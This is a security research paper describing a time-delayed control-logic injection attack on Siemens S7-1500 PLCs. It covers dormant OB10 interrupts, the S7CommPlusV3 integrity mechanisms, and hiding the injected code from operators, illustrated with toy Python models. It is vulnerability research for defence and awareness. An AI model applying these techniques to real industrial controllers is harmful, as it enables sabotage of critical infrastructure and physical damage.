INDEX TERMS Programmable logic controllers, industrial control systems, injection attack, time-of-day block, offline attack.

I. INTRODUCTION

Industrial Control Systems (ICSs) are used to automate critical control processes such as production lines, electrical power grids, oil and gas facilities, petrochemical plants, and others. Each ICS environment consists of two main sites: a control site and a field site. Fig. 1 shows a typical ICS environment. The control center runs ICS services such as Human Machine Interfaces (HMIs) and engineering workstations. The field site has sensors, actuators, and Programmable Logic Controllers (PLCs) that are installed locally to monitor and control physical processes. The engineering workstation is used to configure and program PLCs. It runs PLC vendor-specific programming software to write control logic that defines how the PLC should control and maintain the physical process at a desired state. PLCs are offered by several vendors such as Siemens, Allen-Bradley, Mitsubishi, Schneider and Modicon. Each has its own proprietary firmware, programming language, communication protocols and maintenance software.

In the past, when PLCs were first introduced, it was uncommon for them to be connected to the outer world and they often ran independently, i.e., PLC-based ICS environments were air-gapped. This separation is no longer possible due to new demands such as maximizing profits, minimizing costs, and achieving better efficiency [1]. Therefore, it is not surprising that most modern ICS environments are increasingly connected to corporate networks and no longer controlled/monitored on-site. Unfortunately, this higher connectivity has also enlarged the attack surface and brought its own security challenges, allowing attacks that were

This work is licensed under a Creative Commons Attribution 4.0 License. For more information, see https://creativecommons.org/licenses/by/4.0/ VOLUME 3, 2022

FIG. 1.
An example of an industrial control system environment.

not existing in the times of the air-gapped industrial plants. Stuxnet [12], which targeted the Iranian uranium enrichment program in 2010, played an important role in increasing awareness of security for industrial control systems. This attack showed that no plant is resilient to cyber-attacks and that PLCs can potentially be hacked, causing disastrous damage. Since then, several other ICSs have been successfully attacked, for example the Ukrainian power grid [17], the German steel mill [22], TRITON [16], etc.

In this work, we show that modern PLC-based ICS environments are not fully protected against control logic injection attacks, and that these systems are still quite far from being completely secure. To this end, we present a new attack strategy that allows malicious adversaries to disrupt the physical process controlled by PLCs offline, i.e., without being connected to the target or to its network at the point zero for the attack. The main focus of our investigations is on Siemens devices, precisely the latest PLC models, i.e., devices from the S7-1500 family, and the latest version of the S7CommPlus protocol, i.e., S7CommPlusV3. Our attack approach is structured into two main phases:

1) Patching the control logic program of a PLC with an interrupt, precisely with a Time-of-Day (ToD) interrupt block using the specific Organization Block 10 (OB10). This is done online, i.e., when the adversary has access to the target device. During this phase, the patch has no impact, neither on the physical process nor on the execution of the control logic program, i.e., the patch is in idle mode.

2) Activating the patch injected in the target later, at a certain date and time. This is done offline, i.e., without the need of being connected to the target PLC at the point zero for the attack.
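The decoupling of the two phases can be pictured as a time gate inside the scan cycle: the injected interrupt block stays dormant until the configured date/time is reached, and only then preempts the cyclic program. The following minimal Python sketch models that idea; the names and the trigger date are illustrative assumptions, not Siemens code or APIs.

```python
# Conceptual sketch (not firmware code): a Time-of-Day patch sits idle in the
# scan cycle and fires only once a preconfigured date/time has been reached.
from datetime import datetime

TRIGGER = datetime(2022, 6, 1, 4, 30)   # hypothetical date/time chosen by the attacker

def tod_interrupt_due(now: datetime) -> bool:
    """Models the firmware check that schedules OB10 when the ToD is reached."""
    return now >= TRIGGER

def scan_cycle(now: datetime) -> str:
    if tod_interrupt_due(now):
        return "OB10"   # injected interrupt block preempts the cyclic program
    return "OB1"        # original control logic keeps running unmodified

# Before the trigger the patch is invisible to the physical process:
assert scan_cycle(datetime(2022, 5, 31, 23, 59)) == "OB1"
# At (or after) the trigger the injected OB10 takes over:
assert scan_cycle(datetime(2022, 6, 1, 4, 30)) == "OB10"
```

The point the sketch makes is that nothing in the pre-trigger behavior distinguishes a patched PLC from a clean one, which is exactly what makes the offline activation hard to detect.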
To conduct experiments proving the research, a Fischertechnik training industry plant¹ controlled by an S7-1500 PLC was used to test our attack approach. Our new threat is network based, and can be successfully conducted by any attacker with network access to any S7-1500 PLC with firmware V2.9.2 or lower.

A. MOTIVATION

The objective of this article is to introduce a new control logic injection attack on cryptographically secured PLCs that use sophisticated protection methods. The intention of discussing this new type of attack is to raise awareness of sophisticated attacks and to assist in determining new vulnerabilities and weaknesses existing in PLCs, as they are running in millions of critical industrial plants and constitute a major point of interaction between the cyber and physical worlds. Our main focus is to understand the attack vectors in the first place, and to show the security research community, engineers, and industrial vendors what the consequences of the vulnerabilities would be if they are exploited. To conduct a real-world attack scenario, we chose a device from the Siemens S7-1500 family. Our selection is based on two factors. First, Siemens is the leading provider of industrial automation components and their SIMATIC families hold approximately 30-40% of the industry market [23], [25]. Secondly, Siemens claimed that its newest PLC generation is well secured against various attacks, and their newly developed S7CommPlus protocol supports improved security measures like an advanced anti-replay mechanism and a sophisticated integrity check.

¹https://www.fischertechnikwebshop.com/de-DE/fischertechnik-lernfabrik-4-0-24v-komplettset-mit-sps-s7-1500-560840-de-de

ALSABBAGH AND LANGENDÖRFER: NEW INJECTION THREAT ON S7-1500 PLCS - DISRUPTING THE PHYSICAL PROCESS OFFLINE
These two factors motivated us to show how the most secure PLCs in the Siemens SIMATIC lines can be exploited by external adversaries, and how attackers can confuse the physical process even without being connected to the victim devices. This could lead to disastrous damage to the plants employing such compromised devices. The major benefit of our attack strategy is that the time of running the attack and the point in time when it shall hit the victim can be fully decoupled. For example, if motivated adversaries want to collapse a certain system at a specific date/time, e.g., the day before elections, or the day before going to the stock market, to harm a country or a company respectively, they have sufficient time to inject their malicious code well in advance, and do not need to succeed with the attack just at the right time.

B. PROBLEM STATEMENT

Most injection attacks face two critical challenges. The first is that typical injection attacks are designed to gain access to the target or its network in very specific circumstances, i.e., when the implemented security measure is absent or disabled for a certain reason [2], [3], [5]-[7], [9]-[11], [13], [18], [29], [30], [34], for example, the security measure is being updated, the ICS operator is running some maintenance processes, other devices are being removed/replaced/added to the network, etc. The system is at high risk of getting a malicious infection during these critical phases, but it is not operating in its normal state, i.e., the physical process is most likely temporarily off. Hence, if attackers manage to gain access to the target device during these times and perform their attacks right after that, they will quite likely not impact the physical process. The second challenge is that after the ICS operator is done with the ongoing maintenance processes, he usually reactivates the security measure before re-operating the system once again.
This allows him to reveal and prevent any attempt to inject code into the PLC if the attacker is still connected to the network. Our attack approach overcomes both challenges by patching the PLC with a malicious block at the point in time at which the attacker successfully accesses the network, keeping the infection hidden in the PLC's memory, and launching the attack at a later time of his choosing. This ensures that the attack is neither performed while the system is not operating normally nor detected by an introduced or reactivated security measure. It is also important to highlight that ICS operators are still able to reveal any infection or modification of the control logic program by uploading and comparing both programs, the one running on the PLC and the one stored in the engineering software [10]. In this article, we also overcome this challenge by exploiting a vulnerability existing in the newest S7CommPlus protocol (explained in Section V) to hide the infection from the ICS operator, i.e., he will always be shown the original code in his engineering software whilst the PLC runs the attacker's code.

C. ATTACKER MODEL

Assumption: Our attacker model assumes that an attacker has access to the level-3 network of the Purdue Model² (i.e., the control center network). This assumption is based on real-world ICS attacks, e.g., TRITON [16] and the Ukraine power grid attack [17], that gained access to the control center via a typical IT attack vector such as an infected USB stick or a social engineering attack. We also assume that the attacker has access to the PLC and its respective engineering software along with a packet-sniffing tool such as Wireshark.³ After gaining level-3 network access, an attacker can make use of software and libraries to communicate with the target PLC over the network. As our assumptions have already been reported to hold true in reports on real-world attacks, we are convinced that our attack is a realistic one.
Attacker's goal: The attacker's goal is as follows: disrupting the physical process at a time when he is completely offline, i.e., without being connected to the target or its network at the point zero for the attack, while the physical process of the target network is controlled by the infected PLC. In order to ensure achieving the overall goal, the injection may not be revealed by the ICS operator in the time between infecting the PLC and the attack launch date. In this work, we assume that an attacker achieves these goals if the following three tasks are accomplished:

1) patching the malicious code while the attacker is connected to the target's network.
2) keeping this infection hidden in the PLC's memory without being revealed.
3) disrupting the physical process at a later time when the attacker is completely offline from the target's network.

Attacker's capabilities: The attacker can employ one or more of these capabilities to achieve the goals mentioned earlier:

1) Eavesdropping: read any messages between two communicating parties.
2) Fabrication: initiate a conversation with any other party and compose/send a new message.
3) Interception: intercept messages, and block or modify/resend them.

D. CONTRIBUTIONS

In this article, we take the attack approach presented in our former paper [10] one step further in the direction of exploiting PLCs offline, and extend our experience to the modern S7-1500 PLCs that use the S7CommPlusV3 protocol. Our main contributions in this article are summarized as follows:

1) Extending our control logic injection attack approach presented in [10] from S7-300 to S7-1500 PLCs.
2) Hiding the malicious interrupt code in the PLC's memory until the very moment determined by the attacker.
²https://www.goingstealthy.com/the-ics-prude-model/
³https://www.wireshark.org/

3) Disrupting the physical process controlled by the compromised PLC offline, i.e., when the attacker is not connected to the target or its network.
4) Demonstrating our attack using a real Siemens S7-1512SP controlling a Fischertechnik training factory.
5) Revealing two new vulnerabilities in the integrity protection method that S7-1500 PLCs and their S7CommPlus protocol use.

The rest of this work is organized as follows. Section II provides an overview of control logic injection attacks and related work. Section III presents the technical background, followed by the description of the protection mechanism of the latest S7CommPlus protocol in Section IV. Our attack approach is presented and explained in detail in Section V. In Section VI, we evaluate and discuss the impact of our attack, as well as suggest some possible mitigation methods. Finally, we conclude our work in Section VII.

II. OVERVIEW AND RELATED WORK

One of the recent threats targeting ICSs is the control logic injection attack. Such an attack involves modifying the original control logic running on a target PLC by engaging its engineering software, typically employing a man-in-the-middle approach [3]-[5], [9], [10], [13], [30]-[32]. The main vulnerability exploited in this type of attack is the lack of authentication measures in the PLC protocols. ICS vendors responded to this threat by providing their PLCs with passwords to protect the control logic from unauthorized access, i.e., whenever an ICS supervisor attempts to access the control logic running in a PLC, the device first requires authentication to allow him to read/write the code. This is normally done via a proprietary authentication protocol. But this solution does not fully prevent the controllers from being compromised.
Previous academic efforts [2]-[5], [9], [35] managed to bypass the authentication and to access the control logic in different password-protected PLCs. The authors of the above-mentioned papers discussed two prime ways to bypass the authentication: either by extracting the hash of the password and then pushing it back to the PLC (known as a replay attack), or by using a representative list of (plain-text password, encoded-text password) pairs to brute-force each byte offline. Overall, protecting the control logic by password authentication alone has failed. Attackers are still capable of accessing the PLC's program and manipulating the physical processes controlled by the exposed devices.

In the research community there are two types of control logic injection attacks: traditional control logic injection and firmware injection. However, infecting a PLC firmware would be a challenging task in a real ICS environment, as most PLC vendors protect their PLCs from unauthorized firmware updates by cryptographic methods, e.g., digital signatures, or by allowing firmware updates only via local access (e.g., SD cards and USB). This work does not cover firmware injection and only focuses on the traditional control logic injection attack. In the following, we classify the existing injection attacks aiming at disrupting the physical process into two groups.

FIG. 2. Disrupting the physical process online.

A. DISRUPTING THE PHYSICAL PROCESS ONLINE

The attacks in this group are designed to modify the original control logic program by engaging its engineering software. The physical process controlled by the infected device is impacted right after the malicious code is successfully injected. Fig. 2 shows the attack sequence. The most well-known attack of this kind is the one conducted on Iranian nuclear facilities in 2010, named Stuxnet, which sabotaged centrifuges at a uranium enrichment plant.
The Stuxnet attack [12], [20], [21] used a Windows PC to target Siemens S7-300 and S7-400 PLCs that were connected to variable frequency drives. It infects the control logic of the PLCs to monitor the frequency of the attached motors, and launches an attack if the frequency is within a certain range (i.e., between 807 Hz and 1,210 Hz). More recent examples of such attacks on ICSs occurred in Ukraine [17], [19]. These attacks targeted the electrical distribution grid, causing widespread blackouts. In 2014, the German federal office for information security also announced a cyber-attack on an unnamed steel mill [22]. The hackers manipulated and disrupted control systems to such a degree that a blast furnace could not be properly shut down, resulting in massive damage. McLaughlin [45] conducted a control logic injection attack on a train interlocking program. The malicious program he introduced was reverse engineered using a format program. With the help of the decompiled program, he extracted the field-bus ID that indicated the PLC vendor and model, and then retrieved clues about the process structure and operations. Afterwards he designed his own program that generates unsafe behaviors for the train, e.g., causing conflicting states for the train signals. As a real attack scenario, he targeted timing-sensitive signals and switches. In a follow-up work, McLaughlin et al. [46] implemented SABOT. It required a high-level description of the physical process, for example, "the plant contains two ingredient valves and one drain valve". Such information could be obtained from public channels, and is similar for processes in the same industrial sector. With this information, SABOT generates a behavioral specification for the physical processes and uses incremental model checking to search for a mapping between a variable within the program and a specified physical process. Using this map, SABOT compiles a dynamic payload customized for the physical process.
Both studies were limited to Siemens PLCs, without illustrating many details on reverse engineering. Valentine [48] introduced attacks that could install a jump to a subroutine command, and modify the interaction between two or more ladders in a program. This could be disguised as an erroneous use of scope and linkage by a novice programmer. In 2015, Klick et al. [6] presented the injection of malware into the control logic of a SIMATIC PLC, without disrupting the service. The authors showed that a knowledgeable adversary with access to a PLC can download and upload code to it, as long as the code consists of MC7 bytecode. In a follow-on work, Spenneberg et al. [7] introduced a PLC worm. The worm spreads internally from one PLC to other target PLCs. During the infection phase, the worm scans the network for new target PLCs. A Ladder Logic Bomb malware written in ladder logic or one of the compatible languages was introduced in [8]. Such a malware is inserted by an attacker into existing control logic on PLCs. A group of researchers [9] demonstrated a remote attack on the control logic of PLCs. They were able to infect the PLC and to hide the infection from the engineering software at the control center. They implemented their attack on a Schneider Electric Modicon M221 and its vendor-supplied engineering software SoMachine-Basic. Senthivel et al. [18] presented three control logic injection attacks where an attacker interferes with the engineering operations of downloading and uploading PLC control logic. In the first attack scenario, an attacker, placed in a man-in-the-middle position between a target PLC and its engineering software, injects malicious control logic into the PLC and replaces it with the original control logic to deceive the engineering software when the uploading operation is requested.
The second scenario that their paper presented is very similar to the first scenario but differs in that an attacker uploads malformed control logic instead of the original control logic to crash the engineering software. The last scenario does not require a man-in-the-middle position, as the attacker just injects crafted malformed control logic into the target PLC. Lei et al. [31] demonstrated a spear that can break the security wall of the S7CommPlus protocol that Siemens SIMATIC S7-1200 PLCs utilize. The authors first used the Wireshark software to analyze the communications between the TIA Portal software and S7 PLCs. Then, they applied the reverse debugging software WinDbg⁴ to break the encryption mechanism of the S7CommPlus protocol. Afterwards, they demonstrated two attacks. First, a replay attack was performed to start and stop the PLC remotely. In the second attack scenario, the authors manipulated the input and output values of the victim, causing serious damage to the physical process controlled by the infected PLC. In 2021, researchers in [3] also showed that S7-300 PLCs are vulnerable to such attacks and demonstrated that exploiting the control logic running in a PLC is feasible. After they compromised the security measures of the PLCs, they conducted a successful injection attack and kept their attack hidden from the engineering software by engaging a fake PLC impersonating the real infected device. The researchers behind Rogue7 [30] were able to create a rogue engineering station which can masquerade as the TIA Portal to S7 PLCs, and inject any messages favorable to the attacker. By understanding how cryptographic messages were exchanged, they managed to hide the code in the user memory, which is invisible to the TIA Portal engineering

⁴http://www.windbg.org/

FIG. 3. Disrupting the physical process offline.
station. In [44], a group of security researchers analyzed the anti-replay mechanism that the new S7 PLCs use, and managed to steal an existing communication session and to make unauthorized changes to the PLC states. As part of their experiments, they identified specific bytes necessary to craft valid network packets, and demonstrated a successful replay attack on S7 PLCs. All the attacks mentioned above are limited and require that attackers are connected to the target at the point zero for the attack, which increases the possibility of being revealed by the ICS operators beforehand, or detected by security measures.

B. DISRUPTING THE PHYSICAL PROCESS OFFLINE

The attacks in this class are quite similar to the ones mentioned in the prior class, but differ in that an adversary does not aim at attacking the physical process right after gaining access to the target device. Meaning that, he patches his malicious code once he accesses an exposed PLC, then closes any live connection with the target, keeping his patch inside the PLC's memory in idle mode. Afterwards, he activates his patch and compromises the physical process at a later time of his choosing, even without being connected to the system network (see Fig. 3). To the best of our knowledge, only a few academic efforts discussing this new threat have been published. Serhane et al. [47] focused on ladder logic code vulnerabilities and bad code practices that may become the root cause of bugs and subsequently be exploited by attackers. They showed that attackers could generate uncertainly fluctuating output variables, e.g., using two timers to control the same output values could lead to a race condition. Such a scenario could result in serious damage to the controlled devices, similar to Stuxnet [12]. Another scenario that the authors pointed out is that skilled adversaries could also bypass some functions, manually set certain operands to desired values, and apply empty branches or jumps.
In order to achieve a stealthy modification, attackers could use array instructions or user-defined instructions to log or insert critical parameters and values. They also discussed that attackers could apply an infinite loop via jumps, and use nested timers and jumps to only trigger the attack at a certain time. We, in our former paper [10], presented a novel approach based on injecting the target PLC with a Time-of-Day interrupt code, which interrupts the execution sequence of the control logic at the time the attacker sets. Our evaluation results proved that an attacker could confuse the physical process even when disconnected from the target system. Although our research work was only tested on an old S7-300 PLC, and was just aiming at forcing the PLC to turn into stop mode, the attack was successful and managed to interrupt the execution of the original control logic code running in the patched PLC. Such attacks are more severe than the online ones, as the PLC keeps executing the original control logic correctly without being disrupted for hours, days, weeks, months and even years, until the very moment determined by the attacker. The only realistic way to reveal this kind of attack is that the ICS operator requests the program from the PLC and compares the online code running in the infected device with the offline code that he has on the engineering station. But in this work, we overcome this challenge as illustrated later in Section V.

III. TECHNICAL BACKGROUND

In this section, we outline the architecture of a standard S7 PLC and its operating system, engineering software, user program, Time-of-Day interrupt, and S7 communication protocols.

FIG. 4. A typical S7 PLC architecture.

A. SIMATIC S7 PLC ARCHITECTURE

Siemens produces several PLC product lines in the SIMATIC S7 family, e.g., S7-300, S7-400, S7-1200, and S7-1500. All have the same architecture. Fig.
4 depicts a standard architecture of an S7 PLC that includes input and output modules, a power supply, and memory such as Random Access Memory (RAM) and Electrically Erasable Programmable Read-only Memory (EEPROM). The firmware, known as the Operating System (OS), as well as the user-specific program, is stored in the EEPROM. Input and output devices such as sensors, switches, relays, and valves are connected to the input and output modules. The PLC is connected to a physical process; the input devices provide the current state of the process to the PLC, which the PLC processes through its control logic, and it controls the physical process accordingly via the output devices.

The control logic that an S7 PLC runs is programmed and compiled into a lower representation of the code, i.e., to MC7 or MC7+ bytecode for S7-300/S7-400 or S7-1200/S7-1500 PLCs respectively. After the code has been compiled by the engineering station, its blocks, in MC7/MC7+ format, are downloaded and installed into the PLC via the Siemens S7Comm or S7CommPlus protocol for S7-300/S7-400 or S7-1200/S7-1500 PLCs respectively. Then, the MC7/MC7+ virtual machine in the S7 PLC dispatches the code blocks, and interprets and executes the bytecode.

FIG. 5. Overview of program execution, extracted from [43].

B. OPERATING SYSTEM (OS)

Siemens PLCs run a real-time OS, which initiates the cycle time monitoring. Afterwards, the OS cycles through four steps as shown in Fig. 5. In the first step, the CPU copies the values of the process image of outputs to the output modules. In the second step, the CPU reads the status of the input modules and updates the process image of input values. In the third step, the user program is executed in time slices with a duration of 1 millisecond (ms). Each time slice is divided into three parts, which are executed sequentially: the operating system, the user program and the communication.
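The four-step cycle above can be modeled in a few lines. The toy class below is purely illustrative (the tag names and the mirroring logic are our own assumptions, not Siemens code); it shows the ordering of the steps and, as a side effect, why an input change only reaches the output modules one full cycle later.

```python
# A toy model of the cyclic program execution described above; it only
# illustrates the ordering of the four scan-cycle steps.
class ToyPLC:
    def __init__(self, user_program):
        self.input_modules = {"I0.0": False}       # physical input terminals
        self.output_modules = {}                    # physical output terminals
        self.process_image_inputs = {}
        self.process_image_outputs = {"Q0.0": False}
        self.user_program = user_program

    def scan_cycle(self):
        # 1) copy the process image of outputs to the output modules
        self.output_modules.update(self.process_image_outputs)
        # 2) read the input modules into the process image of inputs
        self.process_image_inputs.update(self.input_modules)
        # 3) execute the user program (OB1) against the process images
        self.user_program(self)
        # 4) communication / housekeeping would happen here

def ob1(plc):
    # trivial control logic: mirror input I0.0 to output Q0.0
    plc.process_image_outputs["Q0.0"] = plc.process_image_inputs["I0.0"]

plc = ToyPLC(ob1)
plc.input_modules["I0.0"] = True
plc.scan_cycle()
# The output module still holds the previous cycle's image value...
assert plc.output_modules["Q0.0"] is False
plc.scan_cycle()
# ...and only reflects the new input one full cycle later.
assert plc.output_modules["Q0.0"] is True
```

This one-cycle latency between the process images and the physical terminals is inherent to the scan model and is independent of the program's complexity.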
The number of time slices depends on the complexity of the current user program and the events interrupting the execution of the program. In normal operation, if an event occurs, the block currently being executed is interrupted at a command boundary and a different organization block that is assigned to the particular event is called. Once the new organization block has been executed, the cyclic program resumes at the point at which it was interrupted. This holds true as long as the maximum allowed cycle time (150 ms by default) is not exceeded. In other words, if there are too many interrupt OBs called in the main OB1, the entire cycle time might be extended beyond what is set in the PLC hardware configuration. Exceeding the maximum allowed execution cycle generates a software error, and the PLC calls a specific block to handle this error, i.e., OB80. There are two ways to handle this error: 1) the PLC turns to stop mode if OB80 is not loaded in the main program, or 2) the PLC executes the instructions that OB80 is programmed with, e.g., an alarm.

C. ENGINEERING SOFTWARE

Siemens provides its Totally Integrated Automation (TIA) Portal software to engineers for developing PLC programs. It consists of two main components: STEP 7 as the development environment for PLCs, and WinCC to configure Human Machine Interfaces (HMIs). Engineers are able to program PLCs in one of the following programming languages: Ladder Diagram (LAD), Function Block Diagram (FBD), Structured Control Language (SCL), and Statement List (STL).

FIG. 6. S7 PLC's user program blocks.

D. USER PROGRAM

S7 PLC programs are divided into the following units: Organization Blocks (OBs), Functions (FCs), Function Blocks (FBs), Data Blocks (DBs), System Functions (SFCs), System Function Blocks (SFBs) and System Data Blocks (SDBs), as shown in Fig. 6.
OBs, FCs and FBs contain the actual code, while DBs provide storage for data structures, and SDBs for the current PLC configuration. The prefix M, for memory, is used for addressing the internal data storage. A simple PLC program consists of at least one organization block called OB1, which is comparable to the main() function in a traditional C program. In more complex programs, engineers can encapsulate code by using functions and function blocks. The only difference is an additional DB as a parameter for calling an FB. The SFCs and SFBs are built into the PLC. The operating system calls OB1 cyclically, and with this call it starts the cyclic execution of the user program.

E. TIME-OF-DAY (TOD) INTERRUPTS

A Time-of-Day (ToD) interrupt is executed at a configured time, either once or periodically depending on the needs of the interrupt, e.g., every minute, hourly, daily, monthly, yearly, or at the end of the month. A CPU 1500 provides 20 organization blocks for processing a ToD interrupt, with the numbers OB10 to OB17, and from OB123 onward. To start a ToD interrupt, a user must first set the start time and then activate the interrupt. He can carry out both activities separately, either in the block properties (automatic configuration) or with system functions (manual configuration). Activating the interrupt in the block properties means that the Time-of-Day interrupt is started automatically. In the following we illustrate both ways briefly:

1) Automatic configuration: The user adds an organization block with the event class Time-of-Day and enters the name, programming language, and number. He programs OB10 with the required instructions to be executed when the interrupt occurs.

2) Manual configuration: In this method, the user uses system function blocks to set, cancel, and activate a Time-of-Day interrupt. He sets the necessary parameters for the interrupt in the main OB1 by using system function blocks, while the interrupt instructions to be executed are programmed in OB10.
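The manual configuration flow can be sketched as a small state machine: OB1 first assigns a start time to the interrupt and then activates it, after which the firmware schedules OB10 whenever the configured time is reached. The Python sketch below models that flow; the method names mirror the Siemens ToD instructions (SET_TINT, ACT_TINT, CAN_TINT), but the class itself and its semantics are a simplified assumption, not the real firmware behavior.

```python
# Sketch of the manual ToD configuration flow driven from OB1.
from datetime import datetime

class TodInterrupt:
    def __init__(self):
        self.ob_nr = None
        self.start = None
        self.active = False

    def SET_TINT(self, ob_nr, start):
        """Assign a start date/time to the interrupt OB (e.g., OB10)."""
        self.ob_nr, self.start = ob_nr, start

    def ACT_TINT(self, ob_nr):
        """Activate the previously configured interrupt."""
        if self.start is not None and self.ob_nr == ob_nr:
            self.active = True

    def CAN_TINT(self, ob_nr):
        """Cancel the interrupt again."""
        if self.ob_nr == ob_nr:
            self.active = False

    def due(self, now):
        """Firmware-side check: schedule OB10 once the ToD is reached."""
        return self.active and now >= self.start

tint = TodInterrupt()
tint.SET_TINT(10, datetime(2022, 6, 1, 4, 30))   # set the start time in OB1
tint.ACT_TINT(10)                                 # activate it in OB1
assert not tint.due(datetime(2022, 5, 31, 12, 0))
assert tint.due(datetime(2022, 6, 1, 4, 30))
```

Note the two-step set-then-activate pattern: an interrupt that has a start time but was never activated (or was cancelled) never fires, which is exactly the "idle mode" the attack described in this article relies on.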
[49] provides technical details on setting and programming Time-of-Day interrupts in S7-1500 PLCs.

F. S7 COMMUNICATION PROTOCOLS

The S7 protocol defines an appropriate format for exchanging S7 messages between devices. Its main communication mode follows a client-server pattern: the HMI or TIA Portal device (client) initiates transactions and the PLC (server) responds by supplying the requested data to the client, or by taking the action requested in the instruction. Siemens provides its PLCs with two different protocol flavors: the older SIMATIC S7 PLCs implement an S7 flavor that is identified by the protocol number 0x32 (S7Comm), while the new generation PLCs implement an S7 flavor that is identified by the protocol number 0x72 (S7CommPlus). The newer S7CommPlus protocol has three sub-versions: S7CommPlusV1, S7CommPlusV2, and S7CommPlusV3.

In this article, we only focus on the S7CommPlusV3 protocol that is used in the newer versions of the TIA Portal from V13 on, and in the newer S7-1500 PLC firmware, e.g., V1.8, V2.0, etc. This protocol requires that both the TIA Portal and the PLC support its features, and it has more complex integrity protection mechanisms, as illustrated in the next section. The S7CommPlusV3 protocol is considered the most secure protocol compared to the older S7CommPlus versions, i.e., S7CommPlusV1 and S7CommPlusV2.

IV. S7COMMPLUSV3 PROTOCOL

The S7CommPlusV3 protocol is used only by the newer versions of the TIA Portal and the S7-1500 PLCs. It supports various operations that are performed by the TIA Portal software, as follows:

1) Start/stop the control program currently loaded in the PLC memory.
2) Download a control program to the PLC.
3) Upload the current control program from the PLC to the TIA Portal.
4) Read the value of a control variable.
5) Modify the value of a control variable.

The above-mentioned operations are translated by the TIA Portal software to S7CommPlus messages before they are

FIG. 7.
The PLC then acts on the messages it receives, executes the control operations, and responds back to the TIA Portal accordingly. The messages are transmitted in the context of a session; each session has a session ID chosen by the PLC. A session begins with a four-message handshake used to select the cryptographic attributes of the session, including the protocol version and keys. After the handshake, all messages are integrity protected using a cryptographic protection mechanism, as illustrated in the next subsection.
A. THE S7 INTEGRITY PROTECTION MECHANISM
Siemens integrated cryptographic protection into its newer S7 proprietary protocol in order to protect its PLCs from unauthorized access. The new mechanism uses two main modules:
1) A session key exchange protocol that the two parties (PLC and TIA Portal) use to establish a secret shared key in each session.
2) Per-fragment message protection that calculates a Message Authentication Code (MAC) value.
1) S7 KEY EXCHANGE PROTECTION
Siemens improved its S7CommPlus protocol by replacing the key generation process of the prior version, i.e., S7CommPlusV2, with a more complex process in the newer version S7CommPlusV3. The new mechanism involves a new key exchange technique that uses elliptic-curve public-key cryptography [33], as depicted in Fig. 7 (the S7 session key establishment mechanism).
FIG. 8. The Structure of the SecurityKeyEncryptedKey BLOB Data.
The first request message is a Hello message that the TIA Portal sends to initialize a new session. Then, the PLC responds back, sharing its firmware version, model, session ID, and a specific 20 bytes known as the PLC_Challenge. The PLC firmware version determines the elliptic-curve public-key pair to be used in the key exchange.
After the TIA Portal receives the second message from the PLC, it activates a derivation algorithm to randomly select a Key Derivation Key (KDK), and to generate the session key from the PLC_Challenge and the selected KDK. Afterwards, the TIA Portal transmits the key, encrypted using Elliptic-Curve Cryptography (ECC), to the PLC in the third message. The third message contains, among other things, two main parts:
a) A data structure called SecurityKeyEncryptedKey, shown in Fig. 8, which contains the selected key encrypted with the PLC's public key.
b) Two 8-byte key fingerprints (additional key), of the PLC public key ID and the selected key, respectively.
Finally, the PLC verifies the third message. If this is done successfully, it returns OK in the fourth message, and from this point on, all the following messages in the session are integrity protected with the derived session key.
2) PER-FRAGMENT MESSAGE PROTECTION
When the TIA Portal downloads/uploads the control logic program to/from an S7-1500 PLC, the assigned S7CommPlus messages are fragmented into many small fragments sent over TCP/IP packets. All messages exchanged between the two parties are integrity protected using HMAC-SHA256 [27]. This integrity protection is applied at the fragment level. That is, instead of a single MAC value at the end of each message, a cryptographic digest is placed in each fragment, between the fragment header and the fragment data, as shown in Fig. 9. [27] presents more technical details about this protection mechanism.
ALSABBAGH AND LANGENDÖRFER: NEW INJECTION THREAT ON S7-1500 PLCS - DISRUPTING THE PHYSICAL PROCESS OFFLINE
FIG. 9. S7CommPlus message with integrity protection at fragment level.
Although fragmenting the S7 messages made things more challenging for attackers, they eventually overcame this protection mechanism and compromised the PLCs using this technique. The vulnerability reported in [28] shows that attackers
could implement a man-in-the-middle approach and successfully managed to modify the network traffic exchanged on port 102/TCP, due to certain properties of the calculation used for this integrity protection.
B. S7COMMPLUS DOWNLOAD MESSAGES - OBJECTS AND ATTRIBUTES
S7 is a request-response protocol. Each request message consists of a request header and a request set. The header contains a function code, which identifies the requested operation, e.g., 0x31 for a download message (see Fig. 9). A single S7CommPlus message might contain multiple objects, each containing multiple attributes. All objects and attributes have unique class identifiers. The CreateObject request builds a new object in the PLC memory with a unique ID (in our example, 0x04ca). The program download message then creates an object of the class ProgramCycleOB. This object contains multiple attributes, each one having values dedicated to a specific purpose. For instance, the FunctionalObject.Code contains the binary executable code that the PLC runs, i.e., the compiled program in the PLC's machine language (MC7+). The Block.AdditionalMac is used as an additional MAC value in the integrity process, and both Block.OptimizedInfo and Block.BodyDescription are equivalent to the program written by the ICS operator, which is stored in the PLC and can later be uploaded, upon request, to a TIA Portal project.
From the security point of view, these attributes are critical data transmitted over the S7CommPlusV3 protocol. That is, if an attacker can intercept the S7 packets containing these attributes, and successfully manages to modify them independently, he is able to cause a source-binary inconsistency, as explained in detail in the next section.
V. ATTACK DESCRIPTION
As in any typical injection attack, we patch our malicious code, a Time-of-Day interrupt block OB10, into the original control logic of the target PLC.
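The object-and-attribute layout of a download message described in Section IV.B can be summarized schematically. The dict shape and the placeholder b"..." values below are ours, purely for illustration; the function code, class name, and attribute names come from the protocol description above.

```python
# Schematic of an S7CommPlus download message (illustration only).
download_message = {
    "header": {"function_code": 0x31},            # download request
    "objects": [
        {
            "class": "ProgramCycleOB",
            "object_id": 0x04CA,                  # example ID from the text
            "attributes": {
                "FunctionalObject.Code": b"...",  # compiled MC7+ binary the PLC runs
                "Block.AdditionalMac": b"...",    # additional MAC for integrity
                "Block.OptimizedInfo": b"...",    # operator's program, stored for upload
                "Block.BodyDescription": b"...",  # decompiled and shown by TIA Portal
            },
        },
    ],
}
```

The split between FunctionalObject.Code (what the PLC executes) and Block.BodyDescription (what the TIA Portal displays) is exactly what the source-binary inconsistency exploits.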
The CPU checks whether the condition of the interrupt is met in each single execution cycle. That is, the attacker's interrupt block will always be checked, but only executed if the date and time of the CPU's clock match the date and time set by the attacker. Hence, we have two cases:
1) The date of the CPU's clock matches the date set in OB10 (the date of the attack). The CPU immediately halts executing OB1, stores the breakpoint's location in a dedicated register, and jumps to execute the content of the corresponding interrupt block OB10.
2) The date of the CPU's clock does not match the date set in OB10. The CPU resumes executing OB1 after checking the interrupt condition, without activating the interrupt and without executing the instructions in OB10.
